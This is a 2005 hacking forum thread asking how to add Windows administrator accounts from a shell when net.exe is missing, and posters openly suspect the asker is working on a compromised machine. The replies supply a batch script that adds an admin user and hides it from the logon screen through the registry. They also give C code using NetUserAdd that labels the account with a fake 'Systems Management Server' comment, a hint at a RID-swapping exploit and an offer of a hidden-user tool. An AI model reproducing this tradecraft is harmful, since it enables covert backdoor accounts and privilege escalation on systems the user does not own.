Greetings
Full Version: Adding Users In Windows
Hmmm, is it possible to add Admin-Users with reg-files and regedit from shell? Even searched on google for it...
Greetings
Greetings
Not using reg files as far as i konw - it has to be done from the net user command
i think it is possible, run regedit in the context of the LOCALSYSTEM and look at the new keys that previously were invisible.
remember that the SAM is actually part of the registry hive
remember that the SAM is actually part of the registry hive
as far as i know, hidden admin users can be added there (or was it the way of hiding existing admin users from logon screen?)
Maybe reversing the CPL file for user controls should do the trick...
Maybe reversing the CPL file for user controls should do the trick...
hmmm, that all wont help me :/
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
QUOTE(PSR @ Apr 26 2005, 12:12 PM)
hmmm, that all wont help me :/
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
i think its not possible i think...the problem is, what can i do, when net.exe is damaged or not existent?
When the net.exe is damaged there should be (depends on os) a net1.exe. You also can use these. When you delete the net.exe maybe a mistake. The new Windows OS regenerate it from %windir%\system32\dllcache\.
When you think it's damaged you can delete it and it should copy a working once from %windir%\system32\dllcache\.
The Info about regenerating I only tested on Windows XP ! dont know if it works at older versions too.
If you have WinXP and up and you havent a net.exe in dllcache it can be you system is corrupted.
Script kiddies "Hackers
" Use methods like thest to "secure" theyre "hacked" boxes.You schould take a look if you find files like ftp.exe , tftp.exe, rcp.exe, wich these kiddies also delete a lot of times.
The best way is to search them in %windir%\system32\dllcache\ when you have a actuall OS like XP.
You have to chance view settings and show hidden files and System files to see it!
It also can be that they installed a rootkit on your machine and made files ftp.exe etc. hidden....
Then use maybe tools like rootkitrevealer from sysinternals (google will do the job).
Srry for my poor english still learning
I hope i could help you a bit....
maybe i'm wrong but if net.exe is corrupted you can always start the sfc check
SFC /SCANNOW
then if the file integrity is corrupted the system will promt to insert cd to fix bad files.
SFC /SCANNOW
then if the file integrity is corrupted the system will promt to insert cd to fix bad files.
He is explicitly saying "from shell"
so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!!
that would be a nice thing to do
so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!!
that would be a nice thing to do
QUOTE(assom @ Apr 26 2005, 11:09 PM)
He is explicitly saying "from shell"
so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!!
that would be a nice thing to do
so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!!
that would be a nice thing to do
Hei assom
I laso thought abit in that way as i read the question ;-)
That seems a "stro maker" question, this guy has got access into an already hacked
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying
you will have to learn that you can loose sometimes, this is a "hacker way to do" too.
Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making,
re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ.
Also your account on GSO could be deleted for that.
But I guess you will explain us that it is your personal computer from wich you lost the key
...
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying
you will have to learn that you can loose sometimes, this is a "hacker way to do" too.
Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making,
re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ.
Also your account on GSO could be deleted for that.
But I guess you will explain us that it is your personal computer from wich you lost the key
...
QUOTE(KoNh @ Apr 27 2005, 12:09 AM)
That seems a "stro maker" question, this guy has got access into an already hacked
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying
you will have to learn that you can loose sometimes, this is a "hacker way to do" too.
Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making,
re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ.
Also your account on GSO could be deleted for that.
But I guess you will explain us that it is your personal computer from wich you lost the key ...
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
1) Sysop knows what script kiddies use to get in there boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (i doubt). Well you've tryed, after some time trying
you will have to learn that you can loose sometimes, this is a "hacker way to do" too.
Then you will try harder on next one after "googleling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making,
re-hacking is lame and punish by many people ou there, be carefull "stealing" other's HQ.
Also your account on GSO could be deleted for that.
But I guess you will explain us that it is your personal computer from wich you lost the key
...I also thought could be a stromaker , rehacker question...
But i thought also could be he got hacked.....
Or he deleted it, but then the os will regenerate it. But read my first reply for more info.
Not directly with a reg file (but I'm reading that was not the really request), but you could find here some good examples to do the job with a .vbs:
hxxp://www.codecomments.com/archive305-2004-9.html
please read carefully the code in the varius threads (search 'ADD' in the title)
Hope somethings may help you.
RFlash
hxxp://www.codecomments.com/archive305-2004-9.html
please read carefully the code in the varius threads (search 'ADD' in the title)
Hope somethings may help you.
RFlash
CODE
http://www.governmentsecurity.org/forum/index.php?act=Attach&type=post&id=2814
Found this exploit awhile back.. may still work. Not sure if it is what are really looking for but.. you can also change hex dec from the admin account to your users account. possiblly.. like user hex= 0x123 and administrator hex= 0x3ea. You will have to find the number for the account you are looking for. Also if you change that hexdec you will need to login as the Administrator with the USERS password. If it stills work....
kv-
what about writing a program yourself which can add users like net.exe can? I'm sure that would solve your problem.
yep scorpion
it will be the best way 2 code an tool that do that job
but whats the api he should use ?
give him some info and im sure he gonna code it himself
u forgotten rcp echo and debug
it will be the best way 2 code an tool that do that job
but whats the api he should use ?
give him some info and im sure he gonna code it himself
QUOTE
That seems a "stro maker" question, this guy has got access into an already hacked
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
computer, if net.exe, net1.exe ftp.exe tftp.exe are nor in place that could be fot two raisons:
u forgotten rcp echo and debug
NetUserAdd is the most important one. it is located in netapi32.dll, open netapi32.dll with a program like PE explorer to look at the functions it exports. it has a lot more interesting API's
U can add a hidden admin on machine via .bat here is the code !
net user HIDDEN-USER /add
net localgroup administrators Raffye /add
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg
@echo "Raffye"=dword:00000000>>%SystemRoot%\tmp.reg
regedit /s %SystemRoot%\tmp.reg
Del %SystemRoot%\tmp.reg
i got a lil cmd line prog that puts an invisible user in administrator group (no matter what's the name of the administrator group). You must be administrator to do that dont know if i upload it here or not msg me if u want !!
syntax:
Hideuser.exe username pass
or
Hideuser.exe username
-------> You'll be asked for a pass
or
Hideuser.exe
--------> You'll be asked for an username and a pass
CODE
net user HIDDEN-USER /add
net localgroup administrators Raffye /add
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg
@echo "Raffye"=dword:00000000>>%SystemRoot%\tmp.reg
regedit /s %SystemRoot%\tmp.reg
Del %SystemRoot%\tmp.reg
i got a lil cmd line prog that puts an invisible user in administrator group (no matter what's the name of the administrator group). You must be administrator to do that dont know if i upload it here or not msg me if u want !!
syntax:
Hideuser.exe username pass
or
Hideuser.exe username
-------> You'll be asked for a pass
or
Hideuser.exe
--------> You'll be asked for an username and a pass
I coded this long ago, but I am pretty sure it worked...
Can't remember which permissions did the new user have though... that you'll have to look into
#pragma hdrstop
#include <condefs.h>
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#define DEBUG 0
// Pointer to Function with 4 params and a return Value
typedef NET_API_STATUS (*ptrNetUserAdd)(LMSTR, DWORD, LPBYTE, LPDWORD);
typedef NET_API_STATUS (*ptrNetUserGetInfo)(LPWSTR, LPWSTR, DWORD, LPBYTE);
#pragma argsused
int main(int argc, char *argv[])
{
// HANDLE handleDLL; // Handle to DLL
HINSTANCE handleDLL; // Handle to DLL
ptrNetUserAdd NetUserAdd;
ptrNetUserGetInfo NetUserGetInfo;
USER_INFO_1 ui;
DWORD dwError = 0;
NET_API_STATUS nStatus;
WCHAR usrName[256];
WCHAR usrPassWord[256];
int len;
#if DEBUG
argc = 3;
argv[1] = "Erion";
argv[2] = "testPass";
#endif
if (argc != 3)
{
printf("Usage: %s UserName Password\n", argv[0]);
exit(1);
}
printf("\n%s coded by Erion for Minted\n\n", argv[0]);
handleDLL = LoadLibrary("netapi32.dll"); // Load the desired DLL
if (handleDLL != NULL)
{
NetUserAdd = (ptrNetUserAdd)GetProcAddress(handleDLL, "NetUserAdd"); // Search the Addres of the Function
if(NetUserAdd)
{
// Convert the strings from ASCII to UNICODE
len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, 0, 0);
MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, usrName, len);
len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, 0, 0);
MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, usrPassWord, len);
ui.usri1_name = usrName;
ui.usri1_password = usrPassWord;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = L"DO NOT MODIFY. Systems Management Server Internal Account";
ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
ui.usri1_script_path = NULL;
// call the function
nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
if(nStatus != NERR_Success)
{
switch(nStatus)
{
case ERROR_ACCESS_DENIED: printf("ACCESS DENIED.\n");break;
case NERR_InvalidComputer:printf("The computer name is invalid.\n");break;
case NERR_NotPrimary:printf("The operation is allowed only on the primary domain controller of the domain.\n");break;
case NERR_GroupExists:printf("The group already exists.\n");break;
case NERR_UserExists:printf("The user account already exists.\n");break;
case NERR_PasswordTooShort:printf("The password is shorter than required.\n");break;
default: printf("Unknown Error %d!\n", dwError);break;
}
}
else
printf("User %s added succesfully\n", argv[1]);
}
else
printf("Couldn't get the NetUserAdd Address\n");
}
else
printf("LoadLibrary() failed for netapi32.dll\n");
FreeLibrary(handleDLL);
}
Can't remember which permissions did the new user have though... that you'll have to look into
CODE
#pragma hdrstop
#include <condefs.h>
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#define DEBUG 0
// Pointer to Function with 4 params and a return Value
typedef NET_API_STATUS (*ptrNetUserAdd)(LMSTR, DWORD, LPBYTE, LPDWORD);
typedef NET_API_STATUS (*ptrNetUserGetInfo)(LPWSTR, LPWSTR, DWORD, LPBYTE);
#pragma argsused
int main(int argc, char *argv[])
{
// HANDLE handleDLL; // Handle to DLL
HINSTANCE handleDLL; // Handle to DLL
ptrNetUserAdd NetUserAdd;
ptrNetUserGetInfo NetUserGetInfo;
USER_INFO_1 ui;
DWORD dwError = 0;
NET_API_STATUS nStatus;
WCHAR usrName[256];
WCHAR usrPassWord[256];
int len;
#if DEBUG
argc = 3;
argv[1] = "Erion";
argv[2] = "testPass";
#endif
if (argc != 3)
{
printf("Usage: %s UserName Password\n", argv[0]);
exit(1);
}
printf("\n%s coded by Erion for Minted\n\n", argv[0]);
handleDLL = LoadLibrary("netapi32.dll"); // Load the desired DLL
if (handleDLL != NULL)
{
NetUserAdd = (ptrNetUserAdd)GetProcAddress(handleDLL, "NetUserAdd"); // Search the Addres of the Function
if(NetUserAdd)
{
// Convert the strings from ASCII to UNICODE
len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, 0, 0);
MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, usrName, len);
len = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, 0, 0);
MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, usrPassWord, len);
ui.usri1_name = usrName;
ui.usri1_password = usrPassWord;
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = L"DO NOT MODIFY. Systems Management Server Internal Account";
ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
ui.usri1_script_path = NULL;
// call the function
nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
if(nStatus != NERR_Success)
{
switch(nStatus)
{
case ERROR_ACCESS_DENIED: printf("ACCESS DENIED.\n");break;
case NERR_InvalidComputer:printf("The computer name is invalid.\n");break;
case NERR_NotPrimary:printf("The operation is allowed only on the primary domain controller of the domain.\n");break;
case NERR_GroupExists:printf("The group already exists.\n");break;
case NERR_UserExists:printf("The user account already exists.\n");break;
case NERR_PasswordTooShort:printf("The password is shorter than required.\n");break;
default: printf("Unknown Error %d!\n", dwError);break;
}
}
else
printf("User %s added succesfully\n", argv[1]);
}
else
printf("Couldn't get the NetUserAdd Address\n");
}
else
printf("LoadLibrary() failed for netapi32.dll\n");
FreeLibrary(handleDLL);
}
ooops, posted it twice 
I have an account on another comp i just got but there i only got an account with lots of limits i want to change this but how do i do this cause i don't have the pass or name of the ADMIN account..
(the comp runs on win2000)
(the comp runs on win2000)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
